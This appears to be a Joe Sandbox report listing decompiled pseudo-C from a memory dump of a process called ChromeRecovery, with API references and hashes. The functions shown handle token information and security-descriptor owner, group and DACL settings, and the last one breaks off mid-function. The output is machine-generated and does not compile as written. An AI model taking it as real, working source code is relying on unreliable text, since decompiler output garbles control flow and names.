Download Yara Rule

C-Code - Quality: 80%

			E00C76AE3(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v32;
				void* __ebp;
				signed int _t18;
				long _t25;
				void* _t26;
				void* _t33;
				void* _t35;
				void* _t44;
				void* _t45;
				intOrPtr* _t47;
				signed int _t48;
				void* _t49;

				_t44 = __edi;
				_t18 =  *0xca8008; // 0x617e0cdd
				_v8 = _t18 ^ _t48;
				_v20 = __ecx;
				if(_a4 == 0) {
					L12:
					__eflags = 0;
					L13:
					return E00C7F35B(_v8 ^ _t48);
				}
				_t35 = 0;
				GetTokenInformation( *(__ecx + 4), 4, 0, 0,  &_v12);
				if(GetLastError() != 0x7a) {
					goto L12;
				}
				_t25 = _v12;
				_t47 = 0;
				_v16 = 0;
				_t53 = _t25 - 0x400;
				if(_t25 > 0x400) {
					L5:
					_push(_t25);
					_t26 = L00C74F66(_t35,  &_v16, _t44, _t47);
					_t47 = _v16;
					_t45 = _t26;
					L6:
					if(_t45 != 0 && GetTokenInformation( *(_v20 + 4), 4, _t45, _v12,  &_v12) != 0) {
						E00C74C42(_a4,  *_t45);
						_t35 = 1;
					}
					while(_t47 != 0) {
						_t47 =  *_t47;
						E00C83557(_t47);
					}
					goto L13;
				}
				_t33 = E00C74B82(_t25, _t53);
				_t25 = _v12;
				if(_t33 == 0) {
					goto L5;
				}
				E00C93B80();
				_t45 = _t49;
				goto L6;
			}

0x00c76ae3
0x00c76ae9
0x00c76af0
0x00c76afc
0x00c76aff
0x00c76b94
0x00c76b94
0x00c76b96
0x00c76ba7
0x00c76ba7
0x00c76b08
0x00c76b12
0x00c76b21
0x00000000
0x00000000
0x00c76b23
0x00c76b26
0x00c76b28
0x00c76b2b
0x00c76b30
0x00c76b49
0x00c76b49
0x00c76b4d
0x00c76b52
0x00c76b55
0x00c76b57
0x00c76b59
0x00c76b7a
0x00c76b7f
0x00c76b7f
0x00c76b8c
0x00c76b84
0x00c76b86
0x00c76b8b
0x00000000
0x00c76b90
0x00c76b34
0x00c76b3b
0x00c76b3e
0x00000000
0x00000000
0x00c76b40
0x00c76b45
0x00000000

APIs

GetTokenInformation.ADVAPI32(?,00000004,00000000,00000000,00000000), ref: 00C76B12
GetLastError.KERNEL32 ref: 00C76B18
GetTokenInformation.ADVAPI32(?,00000004,00000000,00000000,00000000), ref: 00C76B6B

Part of subcall function 00C74B82: __alloca_probe_16.LIBCMT ref: 00C74BA5

__alloca_probe_16.LIBCMT ref: 00C76B40

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: InformationToken__alloca_probe_16$ErrorLast
String ID:
API String ID: 434645856-0
Opcode ID: 7e5c3d4bc7d83c306d4f9948ea2899086bc7bcc65de9f9e0e8f3406eef39b4b1
Instruction ID: dd9d8993ded07f2becef7a33eecbb3f2f3e49c0b7216ef723c9bd9d7ae1d78b7
Opcode Fuzzy Hash: 7e5c3d4bc7d83c306d4f9948ea2899086bc7bcc65de9f9e0e8f3406eef39b4b1
Instruction Fuzzy Hash: 4621A471900508EFDF14AFA5C845EAEBBB8EF45364F148169F519E7251DB30AE04EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C76BAA Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00C76BAA(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v32;
				void* __ebp;
				signed int _t18;
				long _t25;
				void* _t26;
				void* _t33;
				void* _t35;
				void* _t44;
				void* _t45;
				intOrPtr* _t47;
				signed int _t48;
				void* _t49;

				_t44 = __edi;
				_t18 =  *0xca8008; // 0x617e0cdd
				_v8 = _t18 ^ _t48;
				_v20 = __ecx;
				if(_a4 == 0) {
					L12:
					__eflags = 0;
					L13:
					return E00C7F35B(_v8 ^ _t48);
				}
				_t35 = 0;
				GetTokenInformation( *(__ecx + 4), 5, 0, 0,  &_v12);
				if(GetLastError() != 0x7a) {
					goto L12;
				}
				_t25 = _v12;
				_t47 = 0;
				_v16 = 0;
				_t53 = _t25 - 0x400;
				if(_t25 > 0x400) {
					L5:
					_push(_t25);
					_t26 = L00C74F66(_t35,  &_v16, _t44, _t47);
					_t47 = _v16;
					_t45 = _t26;
					L6:
					if(_t45 != 0 && GetTokenInformation( *(_v20 + 4), 5, _t45, _v12,  &_v12) != 0) {
						E00C74C42(_a4,  *_t45);
						_t35 = 1;
					}
					while(_t47 != 0) {
						_t47 =  *_t47;
						E00C83557(_t47);
					}
					goto L13;
				}
				_t33 = E00C74B82(_t25, _t53);
				_t25 = _v12;
				if(_t33 == 0) {
					goto L5;
				}
				E00C93B80();
				_t45 = _t49;
				goto L6;
			}

0x00c76baa
0x00c76bb0
0x00c76bb7
0x00c76bc3
0x00c76bc6
0x00c76c5b
0x00c76c5b
0x00c76c5d
0x00c76c6e
0x00c76c6e
0x00c76bcf
0x00c76bd9
0x00c76be8
0x00000000
0x00000000
0x00c76bea
0x00c76bed
0x00c76bef
0x00c76bf2
0x00c76bf7
0x00c76c10
0x00c76c10
0x00c76c14
0x00c76c19
0x00c76c1c
0x00c76c1e
0x00c76c20
0x00c76c41
0x00c76c46
0x00c76c46
0x00c76c53
0x00c76c4b
0x00c76c4d
0x00c76c52
0x00000000
0x00c76c57
0x00c76bfb
0x00c76c02
0x00c76c05
0x00000000
0x00000000
0x00c76c07
0x00c76c0c
0x00000000

APIs

GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00C76BD9
GetLastError.KERNEL32 ref: 00C76BDF
GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00C76C32

Part of subcall function 00C74B82: __alloca_probe_16.LIBCMT ref: 00C74BA5

__alloca_probe_16.LIBCMT ref: 00C76C07

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: InformationToken__alloca_probe_16$ErrorLast
String ID:
API String ID: 434645856-0
Opcode ID: d30a9c7cda8b4be8f32b5e87328222ce9f2414d958875e17813339d1019c47ca
Instruction ID: d893571c844fbaa1e9a9e455ae601e7346503437a3e0b9f4fa4174a3dba6904b
Opcode Fuzzy Hash: d30a9c7cda8b4be8f32b5e87328222ce9f2414d958875e17813339d1019c47ca
Instruction Fuzzy Hash: CA21F631A00508AFDF159F54CC59AAFBBB8EF44394F248069F459A7251DB30AF44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C7585E Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00C7585E(void* __ebx, void* __edx, struct _ACL* __edi, long _a4) {
				long _v0;
				void* _v4;
				signed int _v8;
				int _v12;
				struct _ACL* _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				struct _SECURITY_DESCRIPTOR* _v36;
				void* _v40;
				long _v44;
				long _v48;
				short _v52;
				signed char _v136;
				void* __ecx;
				void* __esi;
				void* __ebp;
				struct _SECURITY_DESCRIPTOR* _t104;
				void* _t105;
				int _t107;
				int _t112;
				struct _SECURITY_DESCRIPTOR* _t117;
				int _t122;
				long _t133;
				struct _ACL* _t139;
				struct _ACL* _t143;
				void* _t147;
				void* _t149;
				long _t153;
				int _t155;
				struct _SECURITY_DESCRIPTOR* _t160;
				long _t163;
				int _t165;
				struct _SECURITY_DESCRIPTOR* _t170;
				void* _t173;
				struct _SECURITY_DESCRIPTOR* _t174;
				void* _t176;
				PSID* _t178;
				PSID* _t180;
				DWORD* _t183;
				intOrPtr* _t184;
				struct _ACL* _t208;
				DWORD* _t210;
				DWORD* _t212;
				void* _t217;
				PSID* _t218;
				PSID* _t219;
				struct _ACL* _t221;
				intOrPtr* _t222;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t233;
				void* _t239;
				void* _t240;
				void* _t242;

				_t208 = __edi;
				_t207 = __edx;
				_t173 = __ebx;
				_t229 = _t239;
				_push(_t176);
				_push(_t176);
				_t217 = _t176;
				_push(__edi);
				if( *(_t217 + 4) == 0) {
					L4:
					L85();
					_v8 = _v8 & 0x00000000;
					goto L5;
				} else {
					L51();
					_t170 =  *(_t217 + 4);
					if(_t170 == 0) {
						goto L4;
					} else {
						_t178 =  &_v8;
						if(GetSecurityDescriptorOwner(_t170, _t178,  &_v12) == 0) {
							E00C7239D(__ebx, _t178, _t207);
							goto L13;
						} else {
							L5:
							_t208 = _a4;
							_t178 = _t208;
							if(E00C72678(_t178) == 0) {
								L13:
								_push(0x80004005);
								goto L14;
							} else {
								_push(_t173);
								_t8 =  &(_t208->AceCount); // 0xc760d1
								_t173 = _t8;
								_t163 = GetLengthSid(_t173);
								_a4 = _t163;
								_t208 = E00C83B1B();
								_t178 = _t163;
								if(_t208 != 0) {
									_t165 = CopySid(_a4, _t208, _t173);
									_pop(_t173);
									if(_t165 == 0 || SetSecurityDescriptorOwner( *(_t217 + 4), _t208, 0) == 0) {
										_t217 = E00C72482();
										E00C83557(_t208);
										_pop(_t178);
										_push(_t217);
										goto L14;
									} else {
										return E00C83557(_v8);
									}
								} else {
									_push(0x8007000e);
									L14:
									E00C71185(_t178);
									asm("int3");
									_push(_t229);
									_t230 = _t239;
									_push(_t178);
									_push(_t178);
									_push(_t217);
									_t218 = _t178;
									_push(_t208);
									if(_t218[1] == 0) {
										L19:
										L85();
										_v12 = _v12 & 0x00000000;
										goto L20;
									} else {
										L51();
										_t160 = _t218[1];
										if(_t160 == 0) {
											goto L19;
										} else {
											_t180 =  &_v12;
											if(GetSecurityDescriptorGroup(_t160, _t180,  &_v16) == 0) {
												E00C7239D(_t173, _t180, _t207);
												goto L28;
											} else {
												L20:
												_t208 = _v0;
												_t180 = _t208;
												if(E00C72678(_t180) == 0) {
													L28:
													_push(0x80004005);
													goto L29;
												} else {
													_push(_t173);
													_t20 =  &(_t208->AceCount); // 0xc760d1
													_t173 = _t20;
													_t153 = GetLengthSid(_t173);
													_v0 = _t153;
													_t208 = E00C83B1B();
													_t180 = _t153;
													if(_t208 != 0) {
														_t155 = CopySid(_v0, _t208, _t173);
														_pop(_t173);
														if(_t155 == 0 || SetSecurityDescriptorGroup(_t218[1], _t208, 0) == 0) {
															_t218 = E00C72482();
															E00C83557(_t208);
															_pop(_t180);
															_push(_t218);
															goto L29;
														} else {
															return E00C83557(_v12);
														}
													} else {
														_push(0x8007000e);
														L29:
														E00C71185(_t180);
														asm("int3");
														_push(_t230);
														_t231 = _t239;
														_t240 = _t239 - 0xc;
														_push(_t218);
														_t219 = _t180;
														_push(_t208);
														_t104 = _t219[1];
														if(_t104 != 0) {
															L51();
															_t104 = _t219[1];
														}
														_v16 = _v16 & 0x00000000;
														if(_t104 == 0) {
															L85();
															goto L36;
														} else {
															_t183 =  &_v24;
															if(GetSecurityDescriptorDacl(_t104, _t183,  &_v16,  &_v20) == 0) {
																E00C7239D(_t173, _t183, _t207);
																goto L49;
															} else {
																L36:
																_push(_t173);
																_t174 = _v4;
																_t33 =  &(_t174->Group); // 0x6a206a53
																_t105 =  *_t33;
																if(_t105 != 0 ||  *((intOrPtr*)(_t174 + 0x14)) == 0) {
																	_t208 = 0;
																	goto L41;
																} else {
																	_t147 = E00C753FF(_t174, _t174, _t207, _t208, _t219);
																	_v4 = _t147;
																	_t208 = E00C83B1B();
																	_t183 = _t147;
																	if(_t208 == 0) {
																		L49:
																		_push(0x8007000e);
																		goto L50;
																	} else {
																		_t149 = E00C72712(_t174, _t174, _t208, _t219);
																		_t207 = _v4;
																		E00C723B6(_t174, _t208, _v4, _t149, _v4);
																		_t38 =  &(_t174->Group); // 0x6a206a53
																		_t105 =  *_t38;
																		L41:
																		_pop(_t174);
																		if(_t105 != 0 || _t208 != 0) {
																			_t107 = 1;
																		} else {
																			_t107 = 0;
																		}
																		if(SetSecurityDescriptorDacl(_t219[1], _t107, _t208, 0) != 0) {
																			return E00C83557(_v16);
																		} else {
																			_t219 = E00C72482();
																			E00C83557(_t208);
																			_pop(_t183);
																			_push(_t219);
																			L50:
																			_t112 = E00C71185(_t183);
																			asm("int3");
																			_push(_t231);
																			_t233 = _t240;
																			_t242 = _t240 - 0x24;
																			_push(_t208);
																			_t210 = _t183;
																			if(_t210[1] == 0) {
																				L79:
																				return _t112;
																			} else {
																				_push(_t219);
																				_t221 = 0;
																				_v52 = 0;
																				_t112 = GetSecurityDescriptorControl(_t210[1],  &_v52,  &_v44);
																				if(_t112 == 0) {
																					_push(0x80004005);
																					goto L83;
																				} else {
																					if((_v52 & 0x00008000) == 0) {
																						L78:
																						goto L79;
																					} else {
																						_v32 = 0;
																						_v28 = 0;
																						_v20 = 0;
																						_v24 = 0;
																						_v48 = 0;
																						MakeAbsoluteSD(_t210[1], 0,  &_v48, 0,  &_v28, 0,  &_v32, 0,  &_v24, 0,  &_v20);
																						if(GetLastError() != 0x7a) {
																							L84:
																							E00C7239D(_t174, _t183, _t207);
																							asm("int3");
																							_push(_t221);
																							_push(_t210);
																							_t212 = _t183;
																							_t117 = E00C83B1B();
																							_t212[1] = _t117;
																							_t184 = 0x14;
																							if(_t117 == 0) {
																								_push(0x8007000e);
																								goto L90;
																							} else {
																								_t122 = InitializeSecurityDescriptor(_t117, 1);
																								if(_t122 != 0) {
																									return _t122;
																								} else {
																									_t221 = E00C72482();
																									E00C83557(_t212[1]);
																									_t212[1] = _t212[1] & 0x00000000;
																									_pop(_t184);
																									_push(_t221);
																									L90:
																									E00C71185(_t184);
																									asm("int3");
																									_push(_t233);
																									_push(_t221);
																									_t222 = _t184;
																									 *_t222 = 0xca41c0;
																									E00C77F74(_t184);
																									if((_v136 & 0x00000001) != 0) {
																										_push(0xc);
																										E00C7F62D(_t222);
																									}
																									return _t222;
																								}
																							}
																						} else {
																							_push(_t174);
																							_push(_v48);
																							_t174 = E00C83B1B();
																							if(_v24 == 0) {
																								_v36 = 0;
																							} else {
																								_push(_v24);
																								_v36 = E00C83B1B();
																							}
																							if(_v20 == _t221) {
																								_v40 = _t221;
																							} else {
																								_push(_v20);
																								_v40 = E00C83B1B();
																							}
																							_t133 = _v28;
																							if(_t133 == 0) {
																								_v44 = _t221;
																							} else {
																								_push(_t133);
																								_v44 = E00C83B1B();
																								_t133 = _v28;
																							}
																							_t183 = _v32;
																							if(_t183 != 0) {
																								_push(_t183);
																								_t143 = E00C83B1B();
																								_t183 = _v32;
																								_t221 = _t143;
																								_t133 = _v28;
																							}
																							if(_t174 == 0 || _v24 != 0 && _v36 == 0) {
																								L80:
																								_t210 = 0x8007000e;
																								goto L81;
																							} else {
																								_t207 = _v40;
																								if(_v20 == 0 || _t207 != 0) {
																									_t139 = _v44;
																									if(_t133 == 0 || _t139 != 0) {
																										if(_t183 == 0 || _t221 != 0) {
																											_t183 =  &_v28;
																											if(MakeAbsoluteSD(_t210[1], _t174,  &_v48, _t139, _t183, _t221,  &_v32, _v36,  &_v24, _t207,  &_v20) != 0) {
																												_t112 = E00C72C7E(_t210);
																												_t210[1] = _t174;
																												goto L78;
																											} else {
																												_t210 = E00C72482();
																												L81:
																												E00C83557(_t174);
																												E00C83557(_v36);
																												E00C83557(_v40);
																												E00C83557(_v44);
																												E00C83557(_t221);
																												_t242 = _t242 + 0x14;
																												_push(_t210);
																												L83:
																												E00C71185(_t183);
																												goto L84;
																											}
																										} else {
																											goto L80;
																										}
																									} else {
																										goto L80;
																									}
																								} else {
																									goto L80;
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00c7585e
0x00c7585e
0x00c7585e
0x00c7585f
0x00c75861
0x00c75862
0x00c75864
0x00c75866
0x00c7586c
0x00c7588f
0x00c75891
0x00c75896
0x00000000
0x00c7586e
0x00c7586e
0x00c75873
0x00c75878
0x00000000
0x00c7587a
0x00c7587e
0x00c7588b
0x00c7590a
0x00000000
0x00c7588d
0x00c7589a
0x00c7589a
0x00c7589d
0x00c758a6
0x00c7590f
0x00c7590f
0x00000000
0x00c758a8
0x00c758a8
0x00c758a9
0x00c758a9
0x00c758ad
0x00c758b4
0x00c758bc
0x00c758be
0x00c758c1
0x00c758cf
0x00c758d5
0x00c758d8
0x00c758ff
0x00c75901
0x00c75906
0x00c75907
0x00000000
0x00c758ea
0x00c758f6
0x00c758f6
0x00c758c3
0x00c758c3
0x00c75914
0x00c75914
0x00c75919
0x00c7591a
0x00c7591b
0x00c7591d
0x00c7591e
0x00c7591f
0x00c75920
0x00c75922
0x00c75928
0x00c7594b
0x00c7594d
0x00c75952
0x00000000
0x00c7592a
0x00c7592a
0x00c7592f
0x00c75934
0x00000000
0x00c75936
0x00c7593a
0x00c75947
0x00c759c6
0x00000000
0x00c75949
0x00c75956
0x00c75956
0x00c75959
0x00c75962
0x00c759cb
0x00c759cb
0x00000000
0x00c75964
0x00c75964
0x00c75965
0x00c75965
0x00c75969
0x00c75970
0x00c75978
0x00c7597a
0x00c7597d
0x00c7598b
0x00c75991
0x00c75994
0x00c759bb
0x00c759bd
0x00c759c2
0x00c759c3
0x00000000
0x00c759a6
0x00c759b2
0x00c759b2
0x00c7597f
0x00c7597f
0x00c759d0
0x00c759d0
0x00c759d5
0x00c759d6
0x00c759d7
0x00c759d9
0x00c759dc
0x00c759dd
0x00c759df
0x00c759e0
0x00c759e5
0x00c759e7
0x00c759ec
0x00c759ec
0x00c759ef
0x00c759f5
0x00c75a16
0x00000000
0x00c759f7
0x00c759ff
0x00c75a0c
0x00c75aa2
0x00000000
0x00c75a12
0x00c75a1b
0x00c75a1b
0x00c75a1c
0x00c75a1f
0x00c75a1f
0x00c75a24
0x00c75a5f
0x00000000
0x00c75a2c
0x00c75a2e
0x00c75a34
0x00c75a3c
0x00c75a3e
0x00c75a41
0x00c75aa7
0x00c75aa7
0x00000000
0x00c75a43
0x00c75a48
0x00c75a4d
0x00c75a53
0x00c75a58
0x00c75a58
0x00c75a61
0x00c75a61
0x00c75a64
0x00c75a70
0x00c75a6a
0x00c75a6a
0x00c75a6a
0x00c75a80
0x00c75a9f
0x00c75a82
0x00c75a88
0x00c75a8a
0x00c75a8f
0x00c75a90
0x00c75aac
0x00c75aac
0x00c75ab1
0x00c75ab2
0x00c75ab3
0x00c75ab5
0x00c75ab8
0x00c75ab9
0x00c75abf
0x00c75c05
0x00c75c07
0x00c75ac5
0x00c75ac5
0x00c75ac9
0x00c75acf
0x00c75ad6
0x00c75ade
0x00c75c37
0x00000000
0x00c75ae4
0x00c75aeb
0x00c75c04
0x00000000
0x00c75af1
0x00c75af4
0x00c75afc
0x00c75b04
0x00c75b0c
0x00c75b14
0x00c75b1c
0x00c75b2b
0x00c75c41
0x00c75c41
0x00c75c46
0x00c75c47
0x00c75c48
0x00c75c4b
0x00c75c4d
0x00c75c52
0x00c75c55
0x00c75c58
0x00c75c81
0x00000000
0x00c75c5a
0x00c75c5d
0x00c75c65
0x00c75c80
0x00c75c67
0x00c75c6f
0x00c75c71
0x00c75c76
0x00c75c7a
0x00c75c7b
0x00c75c86
0x00c75c86
0x00c75c8b
0x00c75c8c
0x00c75c8f
0x00c75c90
0x00c75c92
0x00c75c98
0x00c75ca1
0x00c75ca3
0x00c75ca6
0x00c75cac
0x00c75cb1
0x00c75cb1
0x00c75c65
0x00c75b31
0x00c75b31
0x00c75b32
0x00c75b3a
0x00c75b40
0x00c75b50
0x00c75b42
0x00c75b42
0x00c75b4b
0x00c75b4b
0x00c75b56
0x00c75b66
0x00c75b58
0x00c75b58
0x00c75b61
0x00c75b61
0x00c75b69
0x00c75b6e
0x00c75b7f
0x00c75b70
0x00c75b70
0x00c75b76
0x00c75b79
0x00c75b7c
0x00c75b82
0x00c75b87
0x00c75b89
0x00c75b8a
0x00c75b90
0x00c75b93
0x00c75b95
0x00c75b95
0x00c75b9a
0x00c75c08
0x00c75c08
0x00000000
0x00c75ba8
0x00c75bac
0x00c75baf
0x00c75bb7
0x00c75bba
0x00c75bc2
0x00c75bd9
0x00c75bee
0x00c75bfb
0x00c75c00
0x00000000
0x00c75bf0
0x00c75bf5
0x00c75c0d
0x00c75c0e
0x00c75c16
0x00c75c1e
0x00c75c26
0x00c75c2c
0x00c75c31
0x00c75c34
0x00c75c3c
0x00c75c3c
0x00000000
0x00c75c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c75baf
0x00c75b9a
0x00c75b2b
0x00c75aeb
0x00c75ade
0x00c75abf
0x00c75a80
0x00c75a41
0x00c75a24
0x00c75a0c
0x00c759f5
0x00c7597d
0x00c75962
0x00c75947
0x00c75934
0x00c75928
0x00c758c1
0x00c758a6
0x00c7588b
0x00c75878

APIs

GetLengthSid.ADVAPI32(00C760D1,00000220,00CA35C8,00000000,00000000,00000000,?,00C760CD), ref: 00C758AD

Part of subcall function 00C75AB2: GetSecurityDescriptorControl.ADVAPI32 ref: 00C75AD6
Part of subcall function 00C75AB2: MakeAbsoluteSD.ADVAPI32 ref: 00C75B1C
Part of subcall function 00C75AB2: GetLastError.KERNEL32 ref: 00C75B22

GetSecurityDescriptorOwner.ADVAPI32 ref: 00C75883

Part of subcall function 00C72482: GetLastError.KERNEL32 ref: 00C72482

CopySid.ADVAPI32 ref: 00C758CF
SetSecurityDescriptorOwner.ADVAPI32 ref: 00C758E0

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DescriptorSecurity$ErrorLastOwner$AbsoluteControlCopyLengthMake
String ID:
API String ID: 3905656193-0
Opcode ID: 21022a57b64a14b0e2e42759458600fb22b5097d558b55e46e182cb530c51093
Instruction ID: e6b0b56b8de1dc4b18c2c496c9fb4071126776af1aab74235f550154c6a7cec4
Opcode Fuzzy Hash: 21022a57b64a14b0e2e42759458600fb22b5097d558b55e46e182cb530c51093
Instruction Fuzzy Hash: 2E11D671510605FBDB14BB65CC4AFAE776CDF44760B10C019B51E96181EFB1EE01A6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C7591A Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00C7591A(void* __ebx, void* __edx, struct _ACL* __edi, long _a4) {
				void* _v0;
				signed int _v8;
				struct _ACL* _v12;
				long _v16;
				long _v20;
				long _v24;
				long _v28;
				struct _SECURITY_DESCRIPTOR* _v32;
				void* _v36;
				long _v40;
				long _v44;
				short _v48;
				signed char _v112;
				void* __ecx;
				void* __esi;
				void* __ebp;
				struct _SECURITY_DESCRIPTOR* _t89;
				void* _t90;
				int _t92;
				int _t97;
				struct _SECURITY_DESCRIPTOR* _t102;
				int _t107;
				long _t118;
				struct _ACL* _t124;
				struct _ACL* _t128;
				void* _t132;
				void* _t134;
				long _t138;
				int _t140;
				struct _SECURITY_DESCRIPTOR* _t145;
				void* _t148;
				struct _SECURITY_DESCRIPTOR* _t149;
				void* _t151;
				PSID* _t153;
				DWORD* _t156;
				intOrPtr* _t157;
				struct _ACL* _t179;
				DWORD* _t181;
				DWORD* _t183;
				void* _t187;
				PSID* _t188;
				struct _ACL* _t190;
				intOrPtr* _t191;
				void* _t197;
				void* _t198;
				void* _t200;
				void* _t205;
				void* _t206;
				void* _t208;

				_t179 = __edi;
				_t178 = __edx;
				_t148 = __ebx;
				_t197 = _t205;
				_push(_t151);
				_push(_t151);
				_t187 = _t151;
				_push(__edi);
				if( *(_t187 + 4) == 0) {
					L4:
					L70();
					_v8 = _v8 & 0x00000000;
					goto L5;
				} else {
					L36();
					_t145 =  *(_t187 + 4);
					if(_t145 == 0) {
						goto L4;
					} else {
						_t153 =  &_v8;
						if(GetSecurityDescriptorGroup(_t145, _t153,  &_v12) == 0) {
							E00C7239D(__ebx, _t153, _t178);
							goto L13;
						} else {
							L5:
							_t179 = _a4;
							_t153 = _t179;
							if(E00C72678(_t153) == 0) {
								L13:
								_push(0x80004005);
								goto L14;
							} else {
								_push(_t148);
								_t8 =  &(_t179->AceCount); // 0xc760d1
								_t148 = _t8;
								_t138 = GetLengthSid(_t148);
								_a4 = _t138;
								_t179 = E00C83B1B();
								_t153 = _t138;
								if(_t179 != 0) {
									_t140 = CopySid(_a4, _t179, _t148);
									_pop(_t148);
									if(_t140 == 0 || SetSecurityDescriptorGroup( *(_t187 + 4), _t179, 0) == 0) {
										_t187 = E00C72482();
										E00C83557(_t179);
										_pop(_t153);
										_push(_t187);
										goto L14;
									} else {
										return E00C83557(_v8);
									}
								} else {
									_push(0x8007000e);
									L14:
									E00C71185(_t153);
									asm("int3");
									_push(_t197);
									_t198 = _t205;
									_t206 = _t205 - 0xc;
									_push(_t187);
									_t188 = _t153;
									_push(_t179);
									_t89 = _t188[1];
									if(_t89 != 0) {
										L36();
										_t89 = _t188[1];
									}
									_v12 = _v12 & 0x00000000;
									if(_t89 == 0) {
										L70();
										goto L21;
									} else {
										_t156 =  &_v20;
										if(GetSecurityDescriptorDacl(_t89, _t156,  &_v12,  &_v16) == 0) {
											E00C7239D(_t148, _t156, _t178);
											goto L34;
										} else {
											L21:
											_push(_t148);
											_t149 = _v0;
											_t21 =  &(_t149->Group); // 0x6a206a53
											_t90 =  *_t21;
											if(_t90 != 0 ||  *((intOrPtr*)(_t149 + 0x14)) == 0) {
												_t179 = 0;
												goto L26;
											} else {
												_t132 = E00C753FF(_t149, _t149, _t178, _t179, _t188);
												_v0 = _t132;
												_t179 = E00C83B1B();
												_t156 = _t132;
												if(_t179 == 0) {
													L34:
													_push(0x8007000e);
													goto L35;
												} else {
													_t134 = E00C72712(_t149, _t149, _t179, _t188);
													_t178 = _v0;
													E00C723B6(_t149, _t179, _v0, _t134, _v0);
													_t26 =  &(_t149->Group); // 0x6a206a53
													_t90 =  *_t26;
													L26:
													_pop(_t149);
													if(_t90 != 0 || _t179 != 0) {
														_t92 = 1;
													} else {
														_t92 = 0;
													}
													if(SetSecurityDescriptorDacl(_t188[1], _t92, _t179, 0) != 0) {
														return E00C83557(_v12);
													} else {
														_t188 = E00C72482();
														E00C83557(_t179);
														_pop(_t156);
														_push(_t188);
														L35:
														_t97 = E00C71185(_t156);
														asm("int3");
														_push(_t198);
														_t200 = _t206;
														_t208 = _t206 - 0x24;
														_push(_t179);
														_t181 = _t156;
														if(_t181[1] == 0) {
															L64:
															return _t97;
														} else {
															_push(_t188);
															_t190 = 0;
															_v48 = 0;
															_t97 = GetSecurityDescriptorControl(_t181[1],  &_v48,  &_v40);
															if(_t97 == 0) {
																_push(0x80004005);
																goto L68;
															} else {
																if((_v48 & 0x00008000) == 0) {
																	L63:
																	goto L64;
																} else {
																	_v28 = 0;
																	_v24 = 0;
																	_v16 = 0;
																	_v20 = 0;
																	_v44 = 0;
																	MakeAbsoluteSD(_t181[1], 0,  &_v44, 0,  &_v24, 0,  &_v28, 0,  &_v20, 0,  &_v16);
																	if(GetLastError() != 0x7a) {
																		L69:
																		E00C7239D(_t149, _t156, _t178);
																		asm("int3");
																		_push(_t190);
																		_push(_t181);
																		_t183 = _t156;
																		_t102 = E00C83B1B();
																		_t183[1] = _t102;
																		_t157 = 0x14;
																		if(_t102 == 0) {
																			_push(0x8007000e);
																			goto L75;
																		} else {
																			_t107 = InitializeSecurityDescriptor(_t102, 1);
																			if(_t107 != 0) {
																				return _t107;
																			} else {
																				_t190 = E00C72482();
																				E00C83557(_t183[1]);
																				_t183[1] = _t183[1] & 0x00000000;
																				_pop(_t157);
																				_push(_t190);
																				L75:
																				E00C71185(_t157);
																				asm("int3");
																				_push(_t200);
																				_push(_t190);
																				_t191 = _t157;
																				 *_t191 = 0xca41c0;
																				E00C77F74(_t157);
																				if((_v112 & 0x00000001) != 0) {
																					_push(0xc);
																					E00C7F62D(_t191);
																				}
																				return _t191;
																			}
																		}
																	} else {
																		_push(_t149);
																		_push(_v44);
																		_t149 = E00C83B1B();
